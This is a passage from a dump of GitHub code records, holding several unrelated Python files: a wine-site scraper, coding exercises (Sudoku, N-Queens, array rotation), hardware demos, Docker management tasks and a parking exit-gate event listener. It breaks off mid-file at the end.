path_specified=True,\n secure=False,\n expires=None,\n discard=False,\n comment=None,\n comment_url=None,\n rest=None\n )\n\ndef extract_bs_text(bs_bloc):\n if bs_bloc:\n return bs_bloc.text\n else:\n return None\n\n# Build urllib2 opener\ncookie_jar = cookielib.LWPCookieJar()\nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))\nopener.addheaders = [('User-agent',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) '+\\\n 'AppleWebKit/537.11 (KHTML, like Gecko) '+\\\n 'Chrome/23.0.1271.64 Safari/537.11')]\nurllib2.install_opener(opener)\n\ndict_bottle_rows = {}\n\n# Visit website\nwebsite_url = u'http://vins-champagnes.carrefour.fr/'\nresponse = urllib2.urlopen(website_url)\ndata = response.read()\nsoup = BeautifulSoup(data)\n# header_nav = soup.find('ul', {'id' : 'header_new_nav'})\n\n# Seems enough to loop on this page (for France at least)\n\ndict_info = {}\ndict_prices = {}\n\nfor i in range(1, 37):\n ref_page_url = u'http://vins-champagnes.carrefour.fr/' +\\\n u'catalogue-region.php?id=87&langue=fr&monnaie=eur&pays=fr' +\\\n u'&pageID={:d}#accestop'.format(i)\n response = urllib2.urlopen(ref_page_url)\n data = response.read()\n soup = BeautifulSoup(data)\n \n # Need to collect and reconcile two blocks for each bottle\n # Both contain url of fiche-produit => stored in two dicts to avoid mistakes\n ls_bloc_prod_info = soup.findAll('div', {'class' : 'box_listing_1col'})\n ls_bloc_prod_price = soup.findAll('div', {'class' : 'box_listing_choix_conditionnement'})\n \n # Extract info for each product\n \n ls_info_txt_fields = ['box_listing_nom_produit',\n 'box_fiche_produit_type_vin_txt',\n 'box_listing_descriptif',\n 'box_fiche_produit_type_vin_txt']\n \n for bloc_prod_info in ls_bloc_prod_info:\n \n bloc_name = bloc_prod_info.find('div', {'class' : 'box_listing_nom_produit'})\n href = None\n if bloc_name and bloc_name.a:\n href = bloc_name.a['href']\n \n # List of txt fields\n ls_prod_info = []\n for info_txt_field in ls_info_txt_fields:\n bloc_info_temp = bloc_prod_info.find('div', {'class' : info_txt_field})\n ls_prod_info.append([info_txt_field, extract_bs_text(bloc_info_temp)])\n \n # list (to be processed later)\n bloc_situation = bloc_prod_info.find('ul', {'class' : 'box_listing_situation'})\n ls_situation = []\n if bloc_situation:\n ls_situation = [extract_bs_text(field) for field in bloc_situation.findAll('li')]\n ls_prod_info.append(['situation', ls_situation])\n \n # span... not sure, text might be enough\n bloc_info_cl = bloc_prod_info.find('span', {'class' : 'box_listing_cl'})\n info_cl = extract_bs_text(bloc_info_cl)\n ls_prod_info.append(['info_cl', info_cl])\n \n dict_info[href] = ls_prod_info\n \n # Extract prices for each product\n \n ls_price_txt_fields = ['box_conditionnement_lot',\n 'box_conditionnement_prix']\n \n for bloc_prod_price in ls_bloc_prod_price:\n \n href = None\n bloc_btn_panier = bloc_prod_price.find('a', {'class' : 'btn_panier_etape_rouge_conteneur',\n 'href' : True})\n if bloc_btn_panier: \n href = bloc_btn_panier['href']\n \n ls_prod_prices = []\n ls_price_blocs = bloc_prod_price.findAll('div', {'class' : 'box_conditionnement'})\n for price_bloc in ls_price_blocs:\n ls_prices = [[price_txt_field,\n extract_bs_text(price_bloc.find('div', {'class' : price_txt_field}))]\\\n for price_txt_field in ls_price_txt_fields]\n # span prix unitaire\n price_field = 'box_conditionnement_prix_unitaire'\n bloc_pu = price_bloc.find('div', {'class' : price_field})\n price_pu = [price_field, None]\n if bloc_pu:\n price_pu = [price_field, ' '.join(bloc_pu.findAll(text = True))]\n ls_prices.append(price_pu) \n ls_prod_prices.append(ls_prices)\n \n dict_prices[href] = ls_prod_prices\n\npath_current_dir = os.path.abspath(os.path.dirname(sys.argv[0]))\nenc_json(dict_prices,\n os.path.join(path_current_dir, u'dict_carrefour_prelim_prices.json'))\nenc_json(dict_info,\n os.path.join(path_currentçdir, u'dict_carrefour_prelim_info.json'))\n","repo_name":"etiennecha/master_code","sub_path":"code_tests/code_wine_scraping/scraping_vins_carrefour_prelim.py","file_name":"scraping_vins_carrefour_prelim.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9920965650","text":"# a program to check if a complete Sudoku grid is valid or not\r\n# Budeli Rendani\r\n# BDLREN001\r\n# 14/05/2014\r\n\r\ndef main():\r\n# initial values\r\n horizontal = True\r\n vertical = True\r\n gridler = True\r\n sudoku = [] \r\n\r\n # populating sudoku grid\r\n length=9\r\n for i in range(length):\r\n row = input(\"\")\r\n sudoku.append(row)\r\n\r\n # grid test\r\n length=9\r\n gchecklist = []\r\n for i in range(length):\r\n line = sudoku[i]\r\n # converts the entire sudoku grid into a liner array\r\n for i in range(length):\r\n gchecklist.append(line[i:i+1])\r\n\r\n # vertical test\r\n length=9 \r\n for x in range(length):\r\n vchecklist = []\r\n for i in range(length):\r\n line = sudoku[i]\r\n vchecklist.append(line[x:x+1])\r\n for i in range(length):\r\n if vchecklist.count(vchecklist[i]) > 1:\r\n vertical = False\r\n \r\n # horizontal check\r\n length=9\r\n for i in range(length):\r\n line = sudoku[i]\r\n hchecklist = []\r\n # converting the sudoku column into a string\r\n for i in range(length):\r\n hchecklist.append(line[i:i+1])\r\n for i in range(length):\r\n if hchecklist.count(hchecklist[i]) > 1:\r\n horizontal = False\r\n\r\n counter = 0\r\n # constructs grids from the linear array of the sudoku grid and checks them\r\n for i in range(len(gchecklist)-27):\r\n grid = \"\"\r\n if i%9 ==0:\r\n counter += 1\r\n if counter%4 == 0 or counter == 1:\r\n if i%3 == 0:\r\n for l in range(3):\r\n grid += gchecklist[i + l]\r\n for l in range(3):\r\n grid += gchecklist[i + 9 + l] \r\n for l in range(3):\r\n grid += gchecklist[i + 18 + l]\r\n num = 0\r\n for k in range(9):\r\n num += int(grid[k:k+1])\r\n if num != 45:\r\n gridler = False\r\n grid = \"\" \r\n if horizontal == True and vertical == True and gridler == True:\r\n print(\"Sudoku grid is valid\")\r\n else: \r\n print(\"Sudoku grid is not valid\")\r\nmain()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/bdlren001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4610082661","text":"# -*- coding: utf-8 -*-\n\"\"\"\n****************************************************\n* privateGPT-container \n* (c) 2023 Alexander Hering *\n****************************************************\n\"\"\"\nimport os\nimport json\n\n\nmodel = os.environ.get(\"MODEL_TO_USE\", \"eachadea_ggml-vicuna-7b-1.1/ggml-vicuna-7b-1.1-q4_2.bin\")\nshared_model_folder = \"/privateGPT-container/machine_learning_models/MODELS\"\nlocal_model_target = \"/privateGPT-container/privateGPT/models\"\nenv_path = \"/privateGPT-container/privateGPT/.env\"\n\n\nif not os.path.exists(local_model_target):\n os.system(f\"ln -sf {shared_model_folder} {local_model_target}\")\n\n\ndata_path = os.path.join(shared_model_folder, \"data.json\")\nif os.path.exists(data_path):\n model_data = json.load(open(data_path, 'r', encoding='utf-8'))[model]\nelse:\n model_data = {\"type\": \"LlamaCpp\"}\n\nenv_file_content = f\"\"\"PERSIST_DIRECTORY=db\nMODEL_TYPE={model_data['type']}\nMODEL_PATH=models/{model}\nEMBEDDINGS_MODEL_NAME=all-MiniLM-L6-v2\nMODEL_N_CTX=1000\n\"\"\"\n\nif os.path.exists(env_path):\n os.remove(env_path)\nopen(env_path, \"w\", encoding='utf-8').write(env_file_content)\n\n","repo_name":"AlHering/privateGPT-container","sub_path":"set_model.py","file_name":"set_model.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16096067839","text":"class Solution:\n '''\n n 皇后问题研究的是如何将 n 个皇后放置在 n×n 的棋盘上,并且使皇后彼此之间不能相互攻击。\n '''\n def solveNQueens(self, n: int) -> List[List[str]]:\n res = []\n s = \".\" * n\n def backtrack(i, tmp,col,z_diagonal,f_diagonal):\n if i == n:\n res.append(tmp)\n return \n for j in range(n):\n if j not in col and i + j not in z_diagonal and i - j not in f_diagonal:\n backtrack(i+1,tmp + [s[:j] + \"Q\" + s[j+1:]], col | {j}, z_diagonal |{i + j} , f_diagonal |{i - j} ) \n \n backtrack(0,[],set(),set(),set()) \n return res\n","repo_name":"algorithm004-02/algorithm004-02","sub_path":"Week 02/id_282/LeetCode_51_282.py","file_name":"LeetCode_51_282.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"40"} +{"seq_id":"41528253137","text":"\"\"\"\n1966 - 프린터 큐\n간단했다. 주어진 대로 구현하면 됐다.\n\"\"\"\nt = int(input())\nfor _ in range(t):\n N , M = map(int,input().split())\n data = list(map(int,input().split()))\n q = []\n # 큐에 우선순위와 인덱스를 튜플형태로 넣는다.\n for i in range(N):\n q.append((data[i],i))\n # 삭제했는지 체크 삭제 하지마 않았다면 flag = 0이며 우선순위가 높다는 뜻이다.\n flag = 0\n # 우선순위에 따라 배열에 저장\n ret = []\n # 몇번째에 출력됐는지 확인\n time = 0\n # 종료 조건은 최대 N개 만큼 출력 될 수 있으므로 \n while time = 222:\n return json.dumps({\"verdict\":\"Accept with Caution\", \"interest\": 15})\n else:\n return json.dumps({\"verdict\": \"Reject\", \"interest\": None})\n else:\n # check the score against threshold\n print(\"Reject\")\n\n#batch processing option\n# import json files\n#data = json.load(open(\"data.json\"))\n\n# def main():\n# try:\n# df = pd.read_json(\"csvjson.json\")\n# accept_reject(df)\n# except:\n# \"Perhaps you did not import a json file\"\n\n# if __name__ == \"__main__\":\n# main()\n\ndf = pd.read_csv(\"my_csv.csv\")\n#accept_reject(df)\n#print(df.iloc[[0]])\n#df = pd.read_json(\"csvjson.json\")\nprint(accept_reject(df.iloc[[0]]))\n\n# Batch processing\n\"\"\"def batch_processing(csv_file, number_of_chunks=1):\n all_batches = []\n chunk_iter = pd.read_csv(csv_file, chunksize=number_of_chunks)\n for chunk in chunk_iter:\n all_batches.append(accept_reject(chunk))\n df_all_batches = pd.concat(all_batches)\n return df_all_batches\n\nbatch_processing(\"my_csv.csv\", 1)\"\"\"\n ","repo_name":"oagbaneje/psychic-adventure","sub_path":"scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31509001195","text":"# simple clock program in micropython for tm1637\n# Tommy Faasen 2018\n\nimport time\nimport tm1637\n\n#pin 4 is clk (D2)\n#pin 5 is data (D1)\n#brightness is set to 2 (0-7)\ndisplay=tm1637.TM1637(4,5,2)\n#clear screen\ndisplay.Clear()\n\nwhile True:\n #get the time\n lt=time.localtime()\n #lt[3] = hour\n #lt[4] = minutes\n mytime=\"%d%d\"%(lt[3],lt[4])\n #check if hour or minutes is 1 or 2 digits\n if lt[3]<10:\n if(lt[4])<10:\n mytime=\" %d0%d\"%(lt[3],lt[4])\n else:\n mytime=\" %d%d\"%(lt[3],lt[4])\n else:\n if(lt[4])<10:\n mytime=\"%d0%d\"%(lt[3],lt[4])\n \n #set display with list of 4 digits 0=0, 1=1, 10=A, 15=F\n display.Show([int(mytime[0]),int(mytime[1]),int(mytime[2]),int(mytime[3])]) \n # show colon every other second\n display.ShowDoublepoint(lt[5]%2) \n print(\"%d:%d:%d\"%(lt[3],lt[4],lt[5]))\n time.sleep(1)\n","repo_name":"it0it0/tm1637","sub_path":"tmclock.py","file_name":"tmclock.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23773341378","text":"#Just a simple file to test out the powers of the motors\nfrom math import *\n\ndef motor_strength(Vlinear, direction, Vangular, wheel):\n wheels = [0, 120, 240] #Placement of each wheel\n wheelAngle = wheels[wheel] #The angle of the target wheel\n Vrx = Vlinear * cos(direction) #The X movement of the robot\n Vry = Vlinear * sin(direction) #The Y movement of the robot\n Vwx = Vrx * cos(wheelAngle) #The X movement of the wheel\n Vwy = Vry * - sin(wheelAngle) #The Y movement of the wheel\n Vw = Vlinear * (cos(direction) * cos(wheelAngle) - sin(direction) * sin(wheelAngle)) + Vangular #The combined strength for the wheel\n return Vw \n\ntest_data = [[1.0, 0.0, 0.0], [1000.0, 0.0, 0.0], [5.0, 0.0, 0.0], [5.0, 180.0, 0.0], [5.0, 90.0, 0.0], [5.0, 270.0, 90.0]]\n\nfor test in test_data:\n print(\"\\n\\n\\n-------------------------------\")\n print(\"Linear speed : \"+str(test[0]))\n print(\"Direction : \"+str(test[1]))\n print(\"Angular speed : \"+str(test[2]))\n print(\"Motor 1 power : \"+str(motor_strength(test[0], test[1], test[2], 0)))\n print(\"Motor 2 power : \"+str(motor_strength(test[0], test[1], test[2], 1)))\n print(\"Motor 3 power : \"+str(motor_strength(test[0], test[1], test[2], 2)))\n","repo_name":"Isaac-bankier/robot","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25326482823","text":"from __future__ import absolute_import\n\nimport celery\nimport docker\nimport time\n\n\n# DOCKER\n@celery.task()\ndef create(portal):\n client = docker.Client(base_url=portal.base_url)\n try:\n portal_name = portal.name.replace(' ', '_').lower()\n container = client.create_container(\n name=portal_name,\n image=portal.operational_system.image_name,\n ports=[portal.initial_port],\n stdin_open=True,\n tty=True,\n command=portal.initial_command,\n host_config=client.create_host_config(\n port_bindings={portal.initial_port: int(portal.initial_port) + 1}))\n\n portal.external_id = container.get('Id')\n portal.state = 'done'\n portal.message_error = ''\n client.start(container=container.get('Id'))\n log_message = 'SUCCESS! Site {} created.'.format(portal_name)\n except Exception as exc:\n portal.message_error = exc\n portal.state = 'error'\n log_message = 'ERROR! {}'.format(exc)\n portal.save()\n return log_message\n\n\n@celery.task()\ndef stop(portal):\n client = docker.Client(base_url=portal.base_url)\n try:\n client.stop(portal.external_id)\n portal.state = 'stopped'\n portal.save()\n log_message = 'SUCCESS! Site {} stopped.'.format(portal.name)\n except Exception as exc:\n log_message = 'ERROR! Site {} not stopped. EXCEPTION: {}'.format(portal.name, exc)\n return log_message\n\n\n@celery.task()\ndef restart(portal):\n client = docker.Client(base_url=portal.base_url)\n try:\n client.restart(portal.external_id)\n portal.state = 'done'\n portal.save()\n log_message = 'SUCCESS! Site {} restarted.'.format(portal.name)\n except Exception as exc:\n log_message = 'ERROR! Site {} not restarted. EXCEPTION: {}'.format(portal.name, exc)\n return log_message\n\n\n@celery.task()\ndef destroy(portal):\n client = docker.Client(base_url=portal.base_url)\n try:\n client.stop(portal.external_id)\n client.remove_container(portal.external_id or portal.name.replace(' ', '_').lower(), force=True)\n portal.state = 'destroyed'\n portal.save()\n log_message = 'SUCCESS! Site {} destroyed.'.format(portal.external_id)\n except Exception as exc:\n log_message = 'ERROR! Site {} not destroyed. EXCEPTION: {}'.format(portal.name, exc)\n return log_message\n","repo_name":"monjebour/portal-creator","sub_path":"portal/tasks/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29504181849","text":"import math\ndef LeftRotationOneTime(arr):\n\n if len(arr)>1:\n temp = arr[0]\n for i in range(1,len(arr)):\n arr[i-1] = arr[i]\n\n arr[i] = temp\n \ndef leftRotatebyd(arr, d): \n for i in range(d): \n LeftRotationOneTime(arr) \n return arr\n####### More efficient algorithm ########### \n\ndef rotateLeft(arr,d):\n\n n = len(arr)\n Gcd = math.gcd(n,d)\n for i in range(Gcd):\n\n temp = arr[i]\n j = i\n while 1:\n k = j + d\n if k>=n:\n k = k-n\n if k==i:\n break\n arr[j] = arr[k]\n j = k\n arr[j] = temp\n\n return arr\n\narray = list(map(int,input(\"Enter your array (as space separated integers) : \").split()))\nd = int(input(\"How many times you want to rotate? \"))\n\na = leftRotatebyd(array,d)\nprint(a)\n","repo_name":"LunaticPrakash/Data-Structure-And-Algorithms","sub_path":"Python/Array/Array-Left-Rotation-By-d.py","file_name":"Array-Left-Rotation-By-d.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13276641180","text":"\nfrom bs4 import BeautifulSoup\nfrom dateutil import parser as dp\nimport asyncio\nfrom datetime import datetime\nimport json\nimport base64\nimport functools\nimport uuid\nimport signal\nimport os\nimport sys\nfrom utils.asyncsql import AsyncDBPool\nfrom utils.asynclog import AsyncLogger\nfrom utils.asyncamqp import AsyncAMQP, ChannelClosed, ChannelInvalidStateError\nfrom utils.asyncsoap import AsyncSOAP\nimport configuration.settings as cs\nfrom datetime import timedelta\nfrom uuid import uuid4\nimport aiohttp\nimport base64\nfrom setproctitle import setproctitle\nimport uvloop\n\n\nclass ExitListener:\n def __init__(self):\n self.__dbconnector_ws: object = None\n self.__dbconnector_is: object = None\n self.__soapconnector_wp: object = None\n self.__amqpconnector: object = None\n self.__logger: object = None\n self.__eventloop: object = None\n self.__eventsignal: bool = False\n self.name = 'ExitListener'\n\n @property\n def eventloop(self):\n return self.__loop\n\n @eventloop.setter\n def eventloop(self, value):\n self.__eventloop = value\n\n @eventloop.getter\n def eventloop(self):\n return self.__eventloop\n\n @property\n def eventsignal(self):\n return self.__eventsignal\n\n @eventsignal.setter\n def eventsignal(self, v):\n return self.__eventsignal\n\n @eventsignal.getter\n def eventsignal(self):\n return self.__eventsignal\n\n async def _initialize(self) -> None:\n setproctitle('is-exits')\n self.__logger = await AsyncLogger().getlogger(cs.IS_LOG)\n await self.__logger.info({'module': self.name, 'info': 'Statrting...'})\n try:\n connections_tasks = []\n connections_tasks.append(AsyncDBPool(cs.IS_SQL_CNX).connect())\n connections_tasks.append(AsyncDBPool(cs.WS_SQL_CNX).connect())\n connections_tasks.append(AsyncSOAP(cs.WS_SOAP_USER, cs.WS_SOAP_PASSWORD, cs.WS_SERVER_ID, cs.WS_SOAP_TIMEOUT, cs.WS_SOAP_URL).connect())\n connections_tasks.append(AsyncAMQP(cs.IS_AMQP_USER, cs.IS_AMQP_PASSWORD, cs.IS_AMQP_HOST, exchange_name='integration', exchange_type='topic').connect())\n self.__dbconnector_is, self.__dbconnector_ws, self.__soapconnector_wp, self.__amqpconnector = await asyncio.gather(*connections_tasks)\n await self.__amqpconnector.bind('exit_signals', ['status.*.exit', 'command.challenged.out'], durable=True)\n await self.__dbconnector_is.callproc('is_processes_ins', rows=0, values=[self.name, 1, os.getpid(), datetime.now()])\n await self.__logger.info({'module': self.name, 'info': 'Started'})\n return self\n except Exception as e:\n await self.__logger.exception({'module': self.name})\n raise e\n\n async def _get_photo(self, ip) -> object:\n # try-except. If IP is valid and timeout wasn't exceeded an object will be returned\n conn = aiohttp.TCPConnector(force_close=True, ssl=False, enable_cleanup_closed=True, ttl_dns_cache=3600)\n async with aiohttp.ClientSession(connector=conn) as session:\n try:\n async with session.get(url=f'http://{ip}/axis-cgi/jpg/image.cgi?camera=1&resolution=1024x768&compression=25', timeout=2, raise_for_status=True) as response:\n result_raw = await response.content.read()\n result = base64.b64encode(result_raw)\n return result\n except:\n return None\n\n async def _get_plate_image(self, ip):\n # try-except. If IP is valid and timeout wasn't exceeded an object will be returned\n conn = aiohttp.TCPConnector(force_close=True, ssl=False, enable_cleanup_closed=True, ttl_dns_cache=3600)\n async with aiohttp.ClientSession(conn) as session:\n try:\n async with session.get(url=f'http://{ip}/module.php?m=sekuplate&p=getImage&img=/home/root/tmp/last_read.jpg', timeout=2, raise_for_status=True) as response:\n result_raw = await response.content.read()\n result = base64.b64encode(result_raw)\n return result\n except:\n return None\n\n async def _get_plate_data(self, ip, ts):\n # try-except. If IP is valid and timeout wasn't exceeded an object will be returned\n conn = aiohttp.TCPConnector(force_close=True, ssl=False, enable_cleanup_closed=True, ttl_dns_cache=3600)\n async with aiohttp.ClientSession(connector=conn) as session:\n try:\n async with session.get(url=f'http://{ip}/module.php?m=sekuplate&p=letture', timeout=2, raise_for_status=True) as response:\n data = await response.content.read()\n soup = BeautifulSoup(data, 'html.parser')\n table_dict = {}\n for row in soup.findAll('tr'):\n aux = row.findAll('td')\n table_dict[aux[0].string] = aux[1].string\n result = {}\n result.update({'confidence': float(table_dict['OCR SCORE'])*100})\n result.update({'plate': table_dict['PLATE']})\n result.update({'date': dp.parse(f\"{table_dict['DATE']} {table_dict['HOUR'][0:2]}:{table_dict['HOUR'][3:5]}:{table_dict['HOUR'][6:8]}\")})\n if ts - result['date'].timestamp() <= 10:\n return result\n else:\n return {'confidence': 0, 'plate': None, 'date': datetime.now()}\n except:\n return {'confidence': 0, 'plate': None, 'date': datetime.now()}\n\n async def _process_loop1_event(self, data, device):\n try:\n if data['value'] == 'OCCUPIED':\n photo1left = await self._get_photo(device['camPhoto1'])\n tasks = []\n tasks.append(self.__dbconnector_is.callproc('is_exit_loop1_ins', rows=0, values=[data['tra_uid'], data['act_uid'], data['device_id'], datetime.fromtimestamp(data['ts'])]))\n tasks.append(self.__dbconnector_is.callproc('is_photo_ins', rows=0, values=[data['tra_uid'], data['act_uid'], photo1left, data['device_id'], device['camPhoto1'], datetime.now()]))\n tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.loop1.occupied'], priority=10))\n await asyncio.gather(*tasks)\n elif data['value'] == 'FREE':\n await asyncio.sleep(0.2)\n temp_data = await self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0])\n if not temp_data is None:\n data['tra_uid'] = temp_data['transactionUID']\n await self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.loop2.free'], priority=10)\n except Exception as e:\n await self.__logger.error({'module': self.name, 'method': 'loop1_event', 'error': repr(e)})\n\n async def _process_barrier_event(self, data, device):\n if data['value'] == 'OPENED':\n pre_tasks = []\n pre_tasks.append(self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0]))\n pre_tasks.append(self.__dbconnector_ws.callproc('wp_exit_get', rows=1, values=[data['device_id'], int(data['ts'])]))\n pre_tasks.append(self._get_photo(device['camPhoto1']))\n pre_tasks.append(self._get_plate_data(device['camPlate'], data['ts']))\n pre_tasks.append(self._get_plate_image(device['camPlate']))\n temp_data, transit_data, photo2left, plate_data, plate_image = await asyncio.gather(*pre_tasks)\n if temp_data['transitionType'] != 'CHALLENGED':\n post_tasks = []\n post_tasks.append(self.__dbconnector_is.callproc('is_exit_barrier_ins', rows=0, values=[data['device_id'], data['act_uid'], transit_data.get('transitionType', None),\n json.dumps(transit_data, default=str), datetime.fromtimestamp(data['ts'])]))\n post_tasks.append(self.__dbconnector_is.callproc('is_photo_ins', rows=0, values=[temp_data['transactionUID'],\n data['act_uid'], photo2left, data['device_id'], device['camPhoto1'], datetime.fromtimestamp(data['ts'])]))\n post_tasks.append(self.__dbconnector_is.callproc('is_plate_ins', rows=0, values=[temp_data['transactionUID'], data['act_uid'], data['device_id'], plate_image,\n plate_data['confidence'], plate_data['plate'], plate_data['date']]))\n data['tra_uid'] = temp_data['transactionUID']\n post_tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.barrier.opened'], priority=10))\n await asyncio.gather(*post_tasks)\n elif data['value'] == 'CLOSED':\n await asyncio.sleep(0.2)\n temp_data = await self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0])\n if not temp_data is None:\n data['tra_uid'] = temp_data['transactionUID']\n await self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.barrier.closed'], priority=10)\n # simulate as normal barrier event\n\n async def _process_command_event(self, data, device):\n pre_tasks = []\n pre_tasks.append(self.__dbconnector_is.callproc('is_exit_get', rows=1, values=['device_id']))\n pre_tasks.append(self._get_photo(device['camPhoto1']))\n pre_tasks.append(self._get_plate_data(device['camPlate'], data['ts']))\n pre_tasks.append(self._get_plate_image(device['camPlate']))\n temp_data, photo2left, plate_data, plate_image = await asyncio.gather(*pre_tasks)\n transit_data = {'transitionId': 0, 'transitionTS': datetime.now(), 'transitionArea': device['areaId'],\n 'transitionPlate': plate_data['plate'], 'transionStatus': 1, 'transitionTariff': -1,\n 'transitionTicket': '', 'subscriptionTicket': '', 'transitionType': 'CHALLENGED', 'transitionFine': 0}\n post_tasks = []\n post_tasks.append(self.__dbconnector_is.callproc('is_exit_command_ins', rows=0, values=[data['device_id'],\n data['act_uid'], json.dumps(transit_data, default=str), datetime.fromtimestamp(data['ts'])]))\n post_tasks.append(self.__dbconnector_is.callproc('is_photo_ins', rows=0, values=[temp_data['transactionUID'],\n data['act_uid'], photo2left, data['device_id'], device['camPhoto1'], datetime.fromtimestamp(data['ts'])]))\n post_tasks.append(self.__dbconnector_is.callproc('is_plate_ins', rows=0, values=[temp_data['transactionUID'], data['act_uid'], data['device_id'], plate_image,\n plate_data['confidence'], plate_data['plate'], plate_data['date']]))\n if not temp_data is None:\n data['tra_uid'] = temp_data['transactionUID']\n post_tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.barrier.opened'], priority=10))\n await asyncio.gather(*post_tasks)\n\n async def _process_loop2_event(self, data, device):\n if data['value'] == 'OCCUPIED':\n pre_tasks = []\n pre_tasks.append(self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0]))\n pre_tasks.append(self._get_photo(device['camPhoto2']))\n temp_data, photo3right = await asyncio.gather(*pre_tasks)\n post_tasks = []\n post_tasks.append(self.__dbconnector_is.callproc('is_exit_loop2_ins', rows=0, values=[data['device_id'], data['act_uid'], data['ts']]))\n post_tasks.append(self.__dbconnector_is.callproc('is_photo_ins', rows=0, values=[temp_data['transactionUID'],\n data['act_uid'], photo3right, data['device_id'], device['camPhoto1'], datetime.fromtimestamp(data['ts'])]))\n if not temp_data is None:\n data['tra_uid'] = temp_data['transactionUID']\n post_tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.loop2.occupied'], priority=10))\n await asyncio.gather(*post_tasks)\n elif data['value'] == 'FREE':\n tasks = []\n # expect that loop2 was passed and session was closed\n temp_data = await self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0])\n if not temp_data is None:\n data['tra_uid'] = temp_data['transactionUID']\n if temp_data['transitionType'] != 'CHALLENGED':\n tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.loop2.free'], priority=10))\n elif temp_data['transitionType'] == 'CHALLENGED':\n tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.challenged.out'], priority=10))\n tasks.append(self.__dbconnector_is.callproc('is_exit_confirm_upd', rows=0, values=[data['device_id'], datetime.fromtimestamp(data['ts'])]))\n await asyncio.sleep(0.2)\n await asyncio.gather(*tasks)\n\n async def _process_reverse_event(self, data, device):\n pre_tasks = []\n pre_tasks.append(self.__dbconnector_ws.callproc('wp_exit_get', rows=1, values=[data['device_id'], int(data['ts'])]))\n pre_tasks.append(self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0]))\n await asyncio.sleep(0.2)\n transit_data, temp_data = await asyncio.gather(*pre_tasks, return_exceptions=True)\n post_tasks = []\n if not temp_data is None:\n data['tra_uid'] = temp_data['transactionUID']\n post_tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.loop1.reverse'], priority=10))\n post_tasks.append(self.__dbconnector_is.callproc('is_exit_reverse_ins', rows=0, values=[data['device_id'], data['act_uid'],\n json.dumps(transit_data, default=str), datetime.fromtimestamp(data['ts'])]))\n await asyncio.gather(*post_tasks)\n\n async def _process(self, redelivered, key, data):\n try:\n # check message keys\n device = await self.__dbconnector_is.callproc('is_column_get', rows=1, values=[data['device_id']])\n if key == 'status.loop1.exit':\n await self._process_loop1_event(data, device)\n elif key == 'status.loop2.exit':\n await self._process_loop2_event(data, device)\n elif key == 'status.barrier.exit':\n await self._process_barrier_event(data, device)\n elif key == 'command.challenged.out':\n await self._process_command_event(data, device)\n elif key == 'status.reverse.exit':\n await self._process_reverse_event(data, device)\n except Exception as e:\n try:\n await self.__dbconnector_is.callproc('is_processes_upd', rows=0, values=[self.name, 1, 1, datetime.now()])\n except:\n pass\n await self.__logger.exception({'module': self.name})\n\n # dispatcher\n async def _dispatch(self):\n while not self.eventsignal:\n await self.__dbconnector_is.callproc('is_processes_upd', rows=0, values=[self.name, 1, 0, datetime.now()])\n try:\n await self.__amqpconnector.receive(self._process)\n except (ChannelClosed, ChannelInvalidStateError):\n pass\n except asyncio.CancelledError:\n pass\n else:\n await self.__dbconnector_is.callproc('is_processes_upd', rows=0, values=[self.name, 0, 0, datetime.now()])\n\n async def _signal_cleanup(self):\n await self.__logger.warning({'module': self.name, 'msg': 'Shutting down'})\n closing_tasks = []\n closing_tasks.append(self.__dbconnector_is.disconnect())\n closing_tasks.append(self.__dbconnector_ws.disconnect())\n closing_tasks.append(self.__amqpconnector.disconnect())\n closing_tasks.append(self.__logger.shutdown())\n await asyncio.gather(*closing_tasks, return_exceptions=True)\n\n async def _signal_handler(self, signal):\n # stop while loop coroutine\n self.eventsignal = True\n tasks = [task for task in asyncio.all_tasks(self.eventloop) if task is not\n asyncio.tasks.current_task()]\n for t in tasks:\n t.cancel()\n asyncio.ensure_future(self._signal_cleanup())\n # perform eventloop shutdown\n try:\n self.eventloop.stop()\n self.eventloop.close()\n except:\n pass\n # close process\n sys.exit(0)\n\n def run(self):\n # use own event loop\n uvloop.install()\n self.eventloop = asyncio.new_event_loop()\n asyncio.set_event_loop(self.eventloop)\n signals = (signal.SIGHUP, 